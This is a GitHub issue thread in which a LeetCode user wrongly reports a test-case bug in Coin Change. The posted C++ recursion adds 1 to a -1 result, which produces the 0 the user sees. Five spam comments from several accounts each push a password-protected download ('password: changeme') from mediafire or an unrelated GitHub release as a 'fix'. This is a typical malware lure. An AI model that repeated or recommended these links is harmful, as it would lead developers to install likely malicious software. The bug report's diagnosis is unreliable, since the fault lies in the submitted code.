### ISSUE TITLE
problem in testcases

### ISSUE THREAD

**Issue by AmanJain1644** [LeetCode-Feedback/LeetCode-Feedback#22053]
### LeetCode Username

amanjain1644

### Problem Number, Title, and Link

322 Coin Change https://leetcode.com/problems/coin-change/description/

### Bug Category

Incorrect test case *(Output of test case is incorrect as per the problem statement)*

### Bug Description

the final answer varies in the similar type of the test case 
In the question it is given that if array element does n't reach to that summation then return -1
when the target is 1 and array is [2] i returned -1 as we can't make 1 from 2 this works fine but when the testcase is 
target = 3 and array = [2] and i return -1 it takes it as 0 as my output , even if i have returned -1 then also 

### Language Used for Code

C++

### Code used for Submit/Run operation

```bash
class Solution {
public:
    int coinChange(vector<int>& coins, int amount) {
        int mini = INT_MAX;
        if(amount==0){
            return 0;
        } 
        if(amount<0){
            return INT_MAX;
        }
        for(int i=0;i<coins.size();i++){
            int ans = coinChange(coins,amount-coins[i]);
            if(ans!=INT_MAX)
            mini = min(mini,ans+1);
        }
        
        return mini==INT_MAX?-1:mini;
    }
};
```

### Expected behavior

the testcase  where target = 3 and array = [2] should accept my answer when i return -1 but it convert it into 0 

### Screenshots

![Screenshot 2024-05-03 185931](https://github.com/LeetCode-Feedback/LeetCode-Feedback/assets/88729130/cf6849fa-5198-4eba-9fc2-76af1297773a)
![image](https://github.com/LeetCode-Feedback/LeetCode-Feedback/assets/88729130/fb3b6405-3aee-4929-a201-e024e2992bc1)

### Additional context

please fix this bug

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
